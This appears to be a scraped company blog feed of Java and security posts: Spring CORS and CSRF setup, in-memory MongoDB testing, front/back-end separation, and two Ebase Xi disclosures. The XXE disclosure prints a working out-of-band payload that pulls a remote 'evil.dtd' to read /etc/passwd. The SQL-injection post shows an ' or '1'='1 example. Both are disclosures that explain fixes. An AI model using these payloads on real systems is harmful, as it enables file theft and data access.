<p>Whenever we do a modification request (POST, PUT, DELETE), our browser will first send a 'preflight' OPTIONS request. This is an extra security check to see if you can modify data. Because Spring MVC ignores OPTIONS requests by default, we will not get a CORS compliant response. We can override this configuration as follows:</p>
<p>When using a Java configuration, in the DispatcherServletInitializer:</p>
<pre><code class="jave">
@Override
protected void customizeRegistration(Dynamic registration) {
registration.setInitParameter("dispatchOptionsRequest", "true");
super.customizeRegistration(registration);
}
</code></pre>
<p>
Or in the web.xml:</p>
<pre><code class="xml">
<servlet>
<servlet-name>yourServlet</servlet-name>
<servlet-class>org.springframework.web.servlet.DispatcherServlet</servlet-class>
<init-param>
<param-name>dispatchOptionsRequest</param-name>
<param-value>true</param-value>
</init-param>
<load-on-startup>1</load-on-startup>
</servlet>
</code></pre>
<p>Now we can write a simple handler for OPTIONS requests:</p>
<pre><code class="java">@Controller
public class OptionsController {
@RequestMapping(method = RequestMethod.OPTIONS)
public ResponseEntity handle() {
return new ResponseEntity(HttpStatus.NO_CONTENT);
}
}
</code></pre>
<p>This controller handles all OPTIONS requests, sending back a NO_CONTENT response with the desired CORS headers added by our interceptor. Now that OPTIONS requests are answered correctly, PUT, POST and DELETE requests will also work correctly.</p>
<p><b>Congratulations, you now have a CORS compliant Spring MVC backend :)</b></p>
<h2>Multiple origins</h2>
<p>
Sometimes you have a backend service that is used by multiple applications and thus serves multiple origins. With some minor code changes we can implement this feature:</p>
<pre><code class="java">
public class CorsInterceptor extends HandlerInterceptorAdapter {
private static final Logger LOGGER = LoggerFactory.getLogger(CorsInterceptor.class);
public static final String REQUEST_ORIGIN_NAME = "Origin";
public static final String CREDENTIALS_NAME = "Access-Control-Allow-Credentials";
public static final String ORIGIN_NAME = "Access-Control-Allow-Origin";
public static final String METHODS_NAME = "Access-Control-Allow-Methods";
public static final String HEADERS_NAME = "Access-Control-Allow-Headers";
public static final String MAX_AGE_NAME = "Access-Control-Max-Age";
private final List<String> origins;
public CorsInterceptor(String origins) {
this.origins = Arrays.asList(origins.trim().split("( )*,( )*"));
}
@Override
public boolean preHandle(HttpServletRequest request, HttpServletResponse response, Object handler) throws Exception {
response.setHeader(CREDENTIALS_NAME, "true");
response.setHeader(METHODS_NAME, "GET, OPTIONS, POST, PUT, DELETE");
response.setHeader(HEADERS_NAME, "Origin, X-Requested-With, Content-Type, Accept");
response.setHeader(MAX_AGE_NAME, "3600");
String origin = request.getHeader(REQUEST_ORIGIN_NAME);
if (origins.contains(origin)) {
response.setHeader(ORIGIN_NAME, origin);
return true; // Proceed
} else {
LOGGER.warn("Attempted access from non-allowed origin: {}", origin);
// Include an origin to provide a clear browser error
response.setHeader(ORIGIN_NAME, origins.iterator().next());
return false; // No need to find handler
}
}
}
</code></pre>
<p>All we do now is check whether the request origin is in the list of allowed origins and echo it back in the response. Thus if somebody makes a request from 'domain-a.com' we return that same 'domain-a.com' as the allowed origin, while for 'domain-b.com' we return 'domain-b.com'.</p>
<p>Because the list of allowed origins is provided as string, we can simply define our origins in a properties file:</p>
<pre>cors.origins=http://www.domain-a.com,http://www.domain-b.com</pre>Anonymousnoreply@blogger.com6tag:blogger.com,1999:blog-8962763253387334081.post-82465535564542030322015-03-25T20:25:00.000+01:002015-12-29T14:30:26.454+01:00Ebase Xi - Unsafe by Default - XXE<b>In my <a href="http://blog.42.nl/2014/12/ebase-xi-queries-unsafe-by-default.html">previous</a> blog post I questioned the safety of the default configuration of <a href="http://www.ebasetech.com/">Ebase Xi</a>. I knew then that something was wrong as I had already found and reported two vulnerabilities to Ebase. But nothing happened.</b> On the 6th of march, much to my surprise, I got an <a class="no_mtli" href="http://www.ebaseftp.com/download/alerts/EbaseXi%20Vulnerability%20Alert.html">official Ebase security alert</a> informing me that 'All Ebase Servers are vulnerable to XXE attacks'. Which was one of the two issues I originally reported. Now that its public knowledge you can read this post for full details.<a name='more'></a><br/><br/>In its essence an XML eXternal Entity (XXE) vulnerability is caused by an unconfigured or incorrectly configured XML parser. <a href="https://www.owasp.org/index.php/XML_External_Entity_%28XXE%29_Processing">Owasp</a> has a nice page on it. But let's start at the beginning.<br/><h1>What are XML eXternal Entities?</h1><br/>An <a href="http://www.w3.org/TR/REC-xml/#sec-entity-decl">XML Entity</a> is a name for a character or series of characters in an XML document. A common example is the HTML non breaking space entity <i>&nbsp;</i> which represents the Unicode character <i>0x00A0</i>. External entities have their contents stored in some external resource such as a file or webpage. You can declare your own entities in the header of the XML document as part of a DTD. When the XML is parsed the entities are replaced by the contents they represent. So if you would reference file:///etc/passwd as an entity on a Linux system the entity would be replaced by the contents of that file. How <i>interesting ;)</i><br/><br/>Unfortunately having the ability to manipulate the XML input file won't allow you to ex-filtrate any data (you can try a <a href="http://en.wikipedia.org/wiki/Billion_laughs">billion laughs attack</a> with it though). For that you will need some part of the request document rendered back into the response document.<br/><br/>The <a href="http://localhost:3030/ufs/UnattendedXMLClient">UnattendedXMLClient</a> servlet in Ebase Xi does this with the name of the form. A typical request looks like this:<br/><pre><?xml version="1.0" encoding="UTF-8"?><br/><UFSFormRequest><Form id="SOME_FORM_ID"></Form></UFSFormRequest></pre><br/>If the form does not exist in the Ebase system you'll get the following error message:<br/><pre><?xml version="1.0" encoding="UTF-8"?><br/><UFSFormResponse><br/><Form id="SOME_FORM_ID" status="System Error"><br/><Error>Form not found in the repository: SOME_FORM_ID</Error><br/></Form><br/></UFSFormResponse></pre><br/>The name of the form is repeated in the response (twice!). So if we could put an entity in the id attribute referencing /etc/passwd the form id would be replaced with the contents of that file and it will be rendered in the response document as the form won't exist. File ex-filtrated. There is one catch though. External entities are <a href="http://www.w3.org/TR/REC-xml/#entproc">not allowed</a> in attribute values. 
<i>Or are they?</i><br/><h1>How to put an external entity in an attribute.</h1><br/>In their 2013 talk '<a href="https://www.youtube.com/watch?v=eBm0YhBrT_c">XML Out-of-Band Data Retrieval</a>' Timur Yunusov and Alexey Osipov described an ingenious way of putting an external entity into an attribute by having an external entity define an internal entity containing the contents of the file.<br/><br/>In the following example you see a slightly modified version of the UFSFormRequest from before. I've added a DOCTYPE declaration that includes a remote entity from example.org. This requires that Ebase server has access to the internet, which is commonly the case. Immediately thereafter I use that entity, so any contents of evil.dtd are placed there.<br/><pre><?xml version="1.0" encoding="UTF-8"?><br/><!DOCTYPE UFSFormRequest [<br/><!ENTITY % remote SYSTEM "http://example.org/evil.dtd"><br/>%remote;<br/>%param1;<br/>]><br/><UFSFormRequest><Form id="&internal;"></Form></UFSFormRequest></pre><br/>The contents of the external DTD are:<br/><pre><!ENTITY % payload SYSTEM "file:///etc/passwd"><br/><!ENTITY % param1 "<!ENTITY internal '%payload;'>"></pre><br/>Two new entities are defined, first the payload, which will hold the contents of the file we're interested in. Second param1 which holds .. another entity declaration as a string! First that string gets processed and %payload; will be replaced with the contents of the file. When the %param1; entity is processed in the request document it will be replaced by a new internal entity declaration which holds the contents of the file. Finally, in the actual xml document &internal; will be replaced by the contents of the file. So now we have assembled the following request on the server:<br/><pre><?xml version="1.0" encoding="UTF-8"?><br/><!DOCTYPE UFSFormRequest [<br/><!ENTITY % remote SYSTEM "http://example.org/evil.dtd"><br/><!ENTITY % payload SYSTEM "file:///etc/passwd"><br/><!ENTITY % param1 "<!ENTITY internal '%payload;'>"><br/><!ENTITY internal 'root:x:0:0:root:/root:/bin/bash'><br/>]><br/><UFSFormRequest><Form id="root:x:0:0:root:/root:/bin/bash"></Form></UFSFormRequest></pre><br/>Obviously the form does not exist, Ebase will send an error response quoting the form name and so we obtain the contents of the file:<br/><pre><?xml version="1.0" encoding="UTF-8"?><br/><UFSFormResponse><br/><Form id="root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin " status="System Error"><br/><Error>Form not found in the repository: ROOT:X:0:0:ROOT:/ROOT:/BIN/BASH BIN:X:1:1:BIN:/BIN:/SBIN/NOLOGIN </Error><br/></Form><br/></UFSFormResponse></pre><br/><h1>Root cause analysis</h1><br/>The classpath of the Ebase server reveals jdom-1.0.jar, which is an (old!) api-wrapper for xml parsing. It defaults to the XML parser provided by the Java Runtime Environment, which for <a href="http://docs.oracle.com/javase/6/docs/technotes/guides/xml/jaxp/JAXP-Compatibility_160.html">Java 6 and later is Xerces</a>. By default the Xerces parser resolves external entities.<br/><h1>Resolution</h1><br/>In their Security Alert Ebase recommends to remove the servlets you don't need from your web.xml and if you do need the servlet give it an obscure path. Removing components you don't need is a good practice. Obscuring names is less so but may work for a while. 
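<br/><br/>The real fix, as described a bit further on, is in the XML parser configuration itself. Below is a minimal hardening sketch using plain JAXP; Ebase's internal parser setup may well differ, so treat this as an illustration of the idea rather than a drop-in patch.<br/><pre>import javax.xml.parsers.DocumentBuilderFactory;
import javax.xml.parsers.ParserConfigurationException;

public class SafeXmlParserFactory {

    public static DocumentBuilderFactory newHardenedFactory() throws ParserConfigurationException {
        DocumentBuilderFactory factory = DocumentBuilderFactory.newInstance();
        // Best option: refuse DOCTYPE declarations altogether.
        factory.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
        // Fallback if DTDs must be allowed: disable external entities,
        // both the general and the parameter form.
        factory.setFeature("http://xml.org/sax/features/external-general-entities", false);
        factory.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
        factory.setXIncludeAware(false);
        factory.setExpandEntityReferences(false);
        return factory;
    }
}</pre>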
Also, if you have a web application firewall, configure it to block outside access to those urls.<br/><br/>Ebase promised a fix in 4.5.4 which, finally, <a href="http://www.ebaseftp.com/download/ebase_45/service_packs/" target="_blank">has appeared</a>. If you have the source code, fixing the XML parser configuration is simple: you need to disable DOCTYPE declarations or, if that is not possible, disable external entities (both the parameter and general forms). Read the <a href="https://www.owasp.org/index.php/XML_External_Entity_%28XXE%29_Processing">Owasp</a> page for full details.<br/><h1>Conclusion</h1><br/>XML eXternal Entity vulnerabilities are a common flaw in applications that process XML. It becomes a risk when XML can be received from unverified outside sources. The default configuration of Ebase Xi exposes 3 of those endpoints. You can check if you're vulnerable using the method outlined in this post. That really leaves only one question: what did Ebase do with the other security issue that I have reported? <i>Let's hope I can write about that soon!</i>Anonymoushttp://www.blogger.com/profile/16306207520582389200noreply@blogger.com0tag:blogger.com,1999:blog-8962763253387334081.post-75794144490104151522015-02-20T12:44:00.000+01:002016-01-20T09:29:54.396+01:00In-memory MongoDB for unit and integration testsA few weeks ago I found myself having to fix a bug in a production system which uses MongoDB as its primary means of storage. As I was unfamiliar with the codebase (we had just taken over the project), the first thing you do is try to find the test covering this functionality.<br />
<br />
Jaw drop; no test in sight. As it turned out, none of the interactions with the backing storage were under any form of testing. So it could happen that a simple aggregation query wasn't returning the expected results.<br />
<br />
This was my first project in which I used MongoDB. Coming from projects using HSQLDB to test the validity and outcome of queries, the first thing that flashed through my mind was an in-memory MongoDB. The first hit on Google wasn't promising (<a href="http://stackoverflow.com/questions/10005697/does-mongo-db-have-an-in-memory-mode">http://stackoverflow.com/questions/10005697/does-mongo-db-have-an-in-memory-mode</a>), but luckily some of the following results hit the jackpot.<br />
<a name='more'></a><br />
<h2>
Embedded MongoDB</h2>
<br />
First I started out with <a href="http://flapdoodle-oss.github.io/de.flapdoodle.embed.mongo/">Embedded MongoDB</a>. This is actually quite neat: it acts as a bridge between Java and MongoDB, downloading and firing up a real MongoDB instance. This has the benefit that you are talking to an instance with the same capabilities as your production environment.<br />
<h3>
Setup</h3>
<br />
At 42 we do a lot with Spring, and what is easier than bootstrapping your JUnit tests using a Spring application context? To help set up Embedded MongoDB I also used <a href="https://github.com/jirutka/embedmongo-spring">https://github.com/jirutka/embedmongo-spring</a>, which provides a nice builder to initialise Embedded MongoDB.<br />
<pre><dependency>
<groupId>cz.jirutka.spring</groupId>
<artifactId>embedmongo-spring</artifactId>
<version>1.3.0</version>
<scope>test</scope>
</dependency>
<dependency>
<groupId>de.flapdoodle.embed</groupId>
<artifactId>de.flapdoodle.embed.mongo</artifactId>
<version>1.46.1</version>
<scope>test</scope>
</dependency></pre>
<br />
A Spring java configuration file could look something like:<br />
<pre>@Configuration
public class IntegrationTestApplicationConfig extends AbstractMongoConfiguration {

    @Autowired
    private Environment env;

    @Override
    protected String getDatabaseName() {
        return env.getRequiredProperty("mongo.db.name");
    }

    @Override
    public Mongo mongo() throws Exception {
        return new EmbeddedMongoBuilder()
                .version("2.6.1")
                .bindIp("127.0.0.1")
                .port(12345)
                .build();
    }
}</pre>
<br />
But for running unit tests, as they claim, I find it a bit heavyweight. It requires a connection to the outside world to download a version of MongoDB (though it's also possible to point it at a location where it can find the MongoDB packages locally). Spinning up a full MongoDB just for unit tests seems a bit overkill, and if you're running separate Spring configurations for different unit tests you could even end up doing this multiple times.
<h2>
Fake Mongo (Fongo)</h2>
<br />
So I ended up using <a href="https://github.com/fakemongo/fongo" title="Fongo">Fongo</a> as it covered the basic needs of the project I was working on. It doesn't support all the functionality that MongoDB offers, but the basic CRUD operations and aggregations are supported.<br />
<h3>
Setup</h3>
<br />
Again the maven and Spring application configuration basics<br />
<pre><dependency>
<groupId>com.github.fakemongo</groupId>
<artifactId>fongo</artifactId>
<version>1.5.8</version>
<scope>test</scope>
</dependency></pre>
<br />
With a Spring java configuration file looking like:<br />
<pre>@Configuration
public class UnitTestApplicationConfig extends AbstractMongoConfiguration {

    @Autowired
    private Environment env;

    @Override
    protected String getDatabaseName() {
        return env.getRequiredProperty("mongo.db.name");
    }

    @Override
    public Mongo mongo() throws Exception {
        return new Fongo(getDatabaseName()).getMongo();
    }
}</pre>
<br />
<h2>
Running the tests</h2>
<br />
I created a base class to help me run the unit tests. This class helps me import collections into the in-memory mongo instance.<br />
<pre>@ActiveProfiles({ "test", "unit" })
@RunWith(SpringJUnit4ClassRunner.class)
@ContextConfiguration(classes = { ApplicationConfig.class })
public abstract class SpringUnitTest {
@Autowired
private MongoTemplate mongoTemplate;
protected void importJSON(String collection, String file) {
try {
for (Object line : FileUtils.readLines(new File(file), "utf8")) {
mongoTemplate.save(line, collection);
}
} catch (IOException e) {
throw new RuntimeException("Could not import file: " + file, e);
}
}
}</pre>
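<br />
Note that importJSON reads the file line by line and stores each line in the given collection, so the referenced file has to contain one JSON document per line. A hypothetical src/test/resources/student.json (the field names are just an example) could look like:<br />
<pre>{ "_id" : 1, "name" : "Thijs" }
{ "_id" : 2, "name" : "Jan" }</pre>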
<br />
And finally the actual test class<br />
<pre>public class StudentRepositoryTest extends SpringUnitTest {

    @Autowired
    private StudentRepository studentRepository;

    @Before
    public void setup() {
        importJSON("student", "src/test/resources/student.json");
    }

    @Test
    public void findStudentByName_should_return_student() {
        assertEquals("Thijs", studentRepository.findByName("Thijs").getName());
    }
}</pre>
<br />
Or you could do an Integration Test with Embedded MongoDB<br />
<pre>public class StudentServiceIT extends SpringIntegrationTest {

    @Autowired
    private StudentService studentService;

    @Autowired
    private StudentRepository studentRepository;

    @Test
    public void create_should_create_new_student() {
        studentService.create("James Doe");
        List<Student> studs = studentRepository.findAll();
        assertEquals(1, studs.size());
        assertEquals("James Doe", studs.get(0).getName());
        assertNotNull(studs.get(0).getEnrollmentDate());
    }
}</pre>
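<br />
The SpringIntegrationTest base class isn't shown in this post. A minimal sketch of what it could look like, assuming it mirrors SpringUnitTest but activates an integration profile together with the Embedded MongoDB configuration (the profile name and the clean-up step are assumptions, not taken from the actual project):<br />
<pre>@ActiveProfiles({ "test", "integration" })
@RunWith(SpringJUnit4ClassRunner.class)
@ContextConfiguration(classes = { IntegrationTestApplicationConfig.class })
public abstract class SpringIntegrationTest {

    @Autowired
    protected MongoTemplate mongoTemplate;

    // Drop the test database after each test so every test starts with a clean slate.
    @After
    public void tearDown() {
        mongoTemplate.getDb().dropDatabase();
    }
}</pre>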
<br />
<h2>
Conclusion</h2>
<br />
I like both Embedded MongoDB and Fongo. I prefer Fongo for unit tests: it's easy to set up and fast to start. But for running integration tests I would suggest using flapdoodle.embed.mongo, as you're actually running on a real MongoDB instance, giving you the closest thing to a real-life scenario.Thijs Vonkhttp://www.blogger.com/profile/12161242264508748111noreply@blogger.com9tag:blogger.com,1999:blog-8962763253387334081.post-63468876222736048902015-02-05T23:00:00.000+01:002016-01-20T09:57:12.601+01:00CSRF / XSRF protection using Spring SecurityFor the last few years there has been an almost constant stream of news articles about some company leaking customer information one way or the other.
While not all of these leaks are caused by badly protected websites themselves (a lot are caused by misconfigurations in the web or data servers), programmers still have a hard time integrating some basic protection against attacks.
<br />
<a name='more'></a>I won't pretend to have knowledge of every aspect of a vigorous web attack against a website (I need to point you to <a href="http://blog.42.nl/2013/12/securing-web-applications-using-owasp.html" title="Erik Hooijmeijer">Erik Hooijmeijer</a> for this), but I do know that some of the basic protections are easy to implement thanks to support in the underlying framework.
<br />
The same goes for a Spring MVC web application. With the Spring Security framework it becomes easier to protect your (web) application. One of the threats is CSRF, short for Cross Site Request Forgery. CSRF or XSRF abuses an already established session with a trusted website to create a 'forged' request and execute an unwanted command on that website. This can be mitigated by requiring a unique token to be sent with the request, a token that has been generated and stored in the HTTP session.
<br />
Spring has the capability to automatically generate and validate the token and the corresponding hidden fields in the MVC forms.
Enabling this feature is as simple as adding the Spring Security dependencies to your pom.xml:
<br />
<pre><code class="java">
<dependency>
<groupId>org.springframework.security</groupId>
<artifactId>spring-security-web</artifactId>
<version>3.2.5.RELEASE</version>
</dependency>
<dependency>
<groupId>org.springframework.security</groupId>
<artifactId>spring-security-config</artifactId>
<version>3.2.5.RELEASE</version>
</dependency></code></pre>
Then add the following classes to your project:
<br />
<SecurityWebApplicationInitializer.java><br />
<pre> <code class="java">
/**
* This WebApplicationInitializer register its security filters on the Application
*
* @Order(2)
public class SecurityWebApplicationInitializer extends AbstractSecurityWebApplicationInitializer {}
</code>
</pre>
<pre> <code class="java">
/**
* This WebApplicationInitializer register its security filters on the Application
*
* @Order(2)
*/
public class SecurityWebApplicationInitializer extends AbstractSecurityWebApplicationInitializer {}
</code>
</pre>
<SecurityConfig.java><br />
<pre> <code class="java">
@Configuration
@EnableWebMvcSecurity
public class SecurityConfig extends WebSecurityConfigurerAdapter {

    /**
     * Because authentication is handled outside the application we don't have to authorize any requests.
     */
    @Override
    @SuppressWarnings("PMD.SignatureDeclareThrowsException")
    protected void configure(HttpSecurity http) throws Exception {
        http.authorizeRequests().antMatchers("/**").permitAll();
    }
}
</code>
</pre>
Notice that in the above file we don't enable CSRF protection explicitly, as Spring enables it by default.<br />
You can, however, explicitly disable it by writing:
<br />
<pre> <code>
protected void configure(HttpSecurity http) throws Exception {
http.authorizeRequests().antMatchers("/**").permitAll().and().csrf().disable();
}
</code>
</pre>
Now, in your JSPs, replace the default <form> tag with the spring-form JSP tag library version and the _csrf hidden input field is automatically injected into your forms.
<br />
There are 2 gotchas!
<br />
<ol>
<li>When you also configure a CharacterEncodingFilter, to make sure you have UTF-8 support all the way through your web stack, you need to make sure that this filter runs before the filters that the SecurityWebApplicationInitializer adds to the mix. Because the CSRF filter reads the request parameters, the character encoding has already been fixed by the time the CharacterEncodingFilter runs, rendering it pointless. So annotate your base WebApplicationInitializer with @Order(1) and the SecurityWebApplicationInitializer with @Order(2). This way the CharacterEncodingFilter is loaded before the other filters.
<br />
There is a second way: you can also override beforeSpringSecurityFilterChain and register the CharacterEncodingFilter there (see the sketch right after this list).
</li>
<li>The security configuration stores the generated token in the HttpSession on the server (to verify against the returned token). So make sure that your load balancers are configured for sticky sessions, otherwise the POST can be forwarded to the wrong web server. As the user has no valid session on that server, the validation of the CSRF token will fail.
</li>
</ol>
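A sketch of that second approach, assuming Spring's CharacterEncodingFilter (treat it as an illustration rather than drop-in code):<br />
<pre> <code class="java">
@Order(2)
public class SecurityWebApplicationInitializer extends AbstractSecurityWebApplicationInitializer {

    @Override
    protected void beforeSpringSecurityFilterChain(ServletContext servletContext) {
        CharacterEncodingFilter encodingFilter = new CharacterEncodingFilter();
        encodingFilter.setEncoding("UTF-8");
        encodingFilter.setForceEncoding(true);
        // insertFilters registers the filter in front of the springSecurityFilterChain,
        // so the encoding is set before the CSRF filter reads the request parameters.
        insertFilters(servletContext, encodingFilter);
    }
}
</code>
</pre>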
Read more on <a href="http://docs.spring.io/spring-security/site/docs/3.2.x/guides/" target="_blank" title="Spring Security">Spring Security</a><br />
And other possible attacks on your website: <a href="https://www.owasp.org/index.php/Top10#OWASP_Top_10_for_2013" target="_blank" title="OWASP">OWASP</a>
Thijs Vonkhttp://www.blogger.com/profile/12161242264508748111noreply@blogger.com45tag:blogger.com,1999:blog-8962763253387334081.post-38015101243540668702014-12-05T16:16:00.000+01:002015-12-14T15:55:41.787+01:00Ebase Xi Queries : Unsafe by Default<p><b>Ebase Xi (from <a href="http://www.ebasetech.com">ebasetech.com</a>) 4.5.2 is a rapid application development platform I recently encountered at a client. The previous developers had left and a security audit revealed that the (many) forms they built with Ebase Xi were susceptible to SQL Injection.</b> In this blog post I will tell how I fixed the SQL Injections and discovered some interesting things along the way.</p><a name='more'></a><br/><br/><h1>SQL Injection</h1><br/><br/><p>Nowadays its common wisdom that SQL Injection is easily prevented by using prepared statements. These force you to use explicit parameters and by doing so make it impossible for the sql parser to misunderstand the sql and parameter boundaries.</p><br/><br/><p>Before prepared statements it was common to build sql statements by appending strings and values to each other. If one of the values contained a quote, part of the value could escape and become part of the query.</p><br/><br/><pre class="lang:java decode:true"><br/>String name="Erik"<br/>String unsafeQuery = "select * from users where username='"+name+"';"<br/><br/>select * from users where username='Erik';<br/></pre> <br/><br/><p>What would happen if the string "Erik" would become "Erik' or '1'='1" ? The query would do something different altogether.</p><br/><br/><pre>select * from users where username='Erik' or '1'='1';</pre><br/><br/><p>Instead of returning a single named user it would return all users!</p><br/><br/><h1>One checkbox to solve all problems..</h1><br/><br/><p>Ebase Xi supports both prepared statements and string concatenation. Unfortunately the default one is string concatenation. Switching between the two modes is easy, its just a single checkbox that needs to be set.</p><br/><br/><p>Easy, just check the checkbox and you're done! Right?</p><br/><br/><p>Unfortunately there is another complication. The Ebase Xi forces you to predefine all column and parameters you will use in your query. This is not very flexible and so ingenious minds thought up a hack that bypasses these restrictions. It requires you to define a special non persistent parameter of type Integer, typically named &&QUERY. Its non persistent because its used as input only, but more importantly because its type Integer Ebase won't put quotes around this value. Also you can put in any string you like (no type safety here!) . And it only works because of string concatenation.</p><br/><br/><p>You can now build your query string in the FPL Scripts and concatenate strings and values as you like. Since they're built outside the scope of the database resource, no amount of prepared statements checkboxes will make these queries safe.</p><br/><br/><p>Ironically, Ebase Xi supports a safe way of doing these kind of dynamic queries by means of the Dynamic Query checkbox. This will cause the runtime to evaluate the query string twice to find any named parameters. For this to work, all parameters must be named and known in the database resource. 
So while its possible to make these dynamic queries safe, it does require the rewriting of the sql statement using parameters.</p><br/><pre><br/>set QUERY="select * from users where name='"+NAME+"'";<br/>fetch USER;<br/></pre><br/><p>would become</p><br/><pre><br/>set QUERY="select * from users where name=&&Q_NAME";<br/>set Q_NAME = NAME;<br/>fetch USER;<br/></pre><br/><p>As you can see rewriting these queries is not difficult, however if you have a great variation of parameters it can become quite a challenge to get it right. Also I've chosen to create separate (non persistent) query parameters as the original parameters may be already in use for something else. Typically making these queries safe involves the following steps:<p><br/><br/><ul><li>check the use Prepared Statements checkbox.</li><br/><li>check the dynamic Query checkbox on the query parameter.</li><br/><li>scan through all the scripts to identify the queries and which parameters are used.</li><br/><li>add non persistent query fields for each of the parameters.</li><br/><li>add form fields for each of the parameters and map them.</li><br/><li>rewrite the queries and assign values to the parameters.</li><br/></ul><br/><br/><h1>Check, check, double check.</h1><br/><br/><p>Checking if you've successfully fixed a query is easy if you enable the debug checkbox on the database resource and follow the logging of your web-application server. (Yes the designer also allows viewing the log, but this is easier) If the query strings contains question marks and the log lists the parameters separately you're good to go!</p><br/><pre><br/>DEBUG Debug for database resource SYSTEEM_EMAIL_FORM - SQL statement:<br/>DEBUG select EMAIL_ADRES from ABC_FORM where id in (select ABC_FORM_ID <br/> from ABC_REQUESTS where id in ( (select ABC_ID from ABC_CASES <br/> where cast(id as varchar2(10)) = ?)))<br/>DEBUG parameter1 : value 13470<br/>DEBUG End execution of command - fetch : 11:58:37.703<br/></pre><br/><h1>Oops: Dynamic Lists</h1><br/><br/><p>With all queries fixed and checkboxes in place I thought I was done. Then my eye fell on another query. No question marks and a quoted value. F***P. Did I forget something? A quick investigation revealed that it was not a database resource but a query made by a dynamic list!</p><br/><br/><p>In Ebase Xi Dynamic Lists are used to fill comboboxes and the like based on a query that supports parameters. Unfortunately: No prepared statement checkbox here (sad) That means that if you use Dynamic Lists with user supplied query parameters you're still susceptible to SQL Injection.</p><br/><br/><p>It turns out that there is a non intuitive workaround for this. The Dynamic Lists support the Dynamic Query checkbox as well. If you use a dynamic query (one with a externally supplied sql statement) Ebase will use a prepared statement.</p><br/><br/><h1>Conclusion</h1><br/><br/><p>It is possible to write sql injection safe queries using Ebase Xi. In fact, its even <a href="http://www.ebasetech.com/ufs/doc/Database_Resources.htm#_Toc309125522">explained</a> in the manual. Sadly the defaults are unsafe and in my experience the form developers are simply unaware of this which results in unsafe systems. 
Fixing the queries is not difficult but just a lot of work.</p><br/><br/><p>Since internet facing Ebase Xi servers in their default configuration are <a href="https://www.google.nl/search?q=inurl%3Aufsmain+inurl%3Aformid">easily identified using Google</a>, I just hope the developers of those systems know what they are doing (and that the default configuration of Ebase Xi is safe - probably not judging from the above..)</p>Anonymoushttp://www.blogger.com/profile/16306207520582389200noreply@blogger.com1tag:blogger.com,1999:blog-8962763253387334081.post-44745602996989269352014-10-16T22:25:00.000+02:002016-07-27T10:42:18.822+02:00The case for separating front- and back-end<strong>At 42 we have an ongoing discussion about the separation of the front- and back-end of an application. The back-end being a RESTful service, and the front-end being a modern MVC JavaScript application written in <a href="http://angularjs.org/" target="_blank" title="AngularJS">AngularJS</a>.</strong><br />
<br />
<strong>There are two camps within our ranks: the first camp believes the front- and back-end should be completely separated, where both applications have separate version control, build processes, and deployments.</strong><br />
<br />
<strong>The second camp believes that the back-end should provide the REST API, serve the JavaScript application, and that there should be one deployment and build process that delivers the whole application (front- and back-end) in one package.</strong><br />
<br />
Disclaimer: I'm in the camp that believes strongly in separating the two. So I want to argue the case for separating front- and back-end completely in this post.
<br />
<a name='more'></a><h2>
History</h2>
In ye old days there was only one way to create a website: Using a text-editor you started writing HTML, and when you were done, you uploaded it to a web server. The HTML was static and every time something needed to change you edited the HTML file, and uploaded it again. Easy peasy.<br />
<br />
Smart programmers thought: "if we can generate the HTML dynamically, we can do way more cool stuff with the web." Thus was the back-end created and programmers rejoiced. You picked a language and a database and off you’d go. We didn't create websites anymore but web applications.<br />
<br />
A funny thing happened to HTML and CSS along the way. They seemed to become less important to web development, almost a necessary evil to make things work. Take job descriptions from this period: in big bold letters, "Looking for Java developer"; somewhere at the bottom of a list, in a much smaller font, "Knowledge of HTML and CSS is a plus".<br />
<br />
We saw HTML and CSS as a thing to be generated, not as the actual application. The actual application was written in Java, PHP or C#; the HTML was just a build artifact waiting to be served. Heck, some platforms such as "ASP.NET Web Forms" went out of their way to hide any sort of HTML from the developer.<br />
<br />
Then the Ajax revolution happened. Before that we thought of JavaScript as a horrible monstrous little language for displaying animated snowflakes around Christmas. Suddenly we could do so much more, we could provide an interactivity and responsiveness never seen before.<br />
<br />
I remember seeing 'Ajax' for the first time on Gmail, it was loading new emails whilst the page was kept open. I didn't believe my eyes, I was sure I was seeing things. I checked my computer to see if I had installed some Google application that refreshed my browser somehow, or that I installed some plugin.<br />
<br />
Nope, JavaScript was doing an XMLHttpRequest within the browser. It didn't take long before I started using Ajax to impress my coworkers. Then jQuery came along with excellent support for Ajax, and Ajax became commonplace.<br />
<br />
JavaScript became another 'plus' in job descriptions. Books describing its good parts came out, and it was really growing up. People started to see its power and what it meant for our end users.<br />
<br />
Then the iPhone happened and later Android. Suddenly we found ourselves in need of writing APIs to provide these apps with the same data and CRUD functionality our traditional web apps needed. Since our web apps didn't use Ajax for everything, we started writing REST APIs next to our traditional endpoints. Effectively writing some functionality twice.<br />
<br />
Then came a second JavaScript breakthrough: MVC frameworks started popping up, such as Backbone.js and later Angular, Ember, Knockout, etc. JavaScript, it seemed, had learned its lessons from the back-end world.<br />
<br />
But what if the 'MVC' front-end also only used the RESTful back-end, like the iOS and Android apps already did? Then all 'apps' would use the exact same calls, and the web app would no longer be a 'special' case. REST calls returning JSON all the way down.<br />
<br />
Our MVC JavaScript apps now rivaled native iOS and Android apps in code size and complexity. With the coming of Node.js, which allows you to run JavaScript outside of the browser, there even came build tools and task runners written in JavaScript.<br />
<br />
The front-end part of the equation has finally come onto its own, no longer needing a special 'relationship' with the language the back-end side was programmed in.<br />
<br />
Now that the history is out of the way I'll start making my case.<br />
<h2>
Separation of Concerns</h2>
When I came to work at 42 my first assignment was assisting on a Java project that needed to provide a RESTful interface for an iOS app. The project already had a web based front-end, the idea was that the iOS app would eventually support all features the web app did.<br />
<br />
The web app front-end used JSP with some jQuery to make it more dynamic. Not every feature used Ajax, but most did, so another goal of the project was to use Ajax for everything and gut JSP from the project. This way the web app and the iOS app became equals, using the exact same API.<br />
<br />
We went from a project that had its front- and back-end interwoven, to one where the two communicated only via Ajax calls. The back-end's job was to provide data, expose ways to manipulate it, and to secure access to the data. Its last job was to serve the HTML for the web app.<br />
<br />
When we were done I looked at the relationship between the front- and back-end. The only concrete relationship the two had was that the back-end served the front-end. If I had ripped out the HTML from the project and had it served by another server under the same domain, the Java back-end and even the end user would be none the wiser; everything would still work as before.<br />
<br />
Looking at the relationship between the iOS app and the web app I realized they were brothers, they were familiar. Both used the back-end in the same way to authenticate a user and send the same HTTP GET and POST request to get things done.<br />
<br />
I realized something: When the back-end and front-end only communicate with each other, but don't need each other, they are separate entities.<br />
<br />
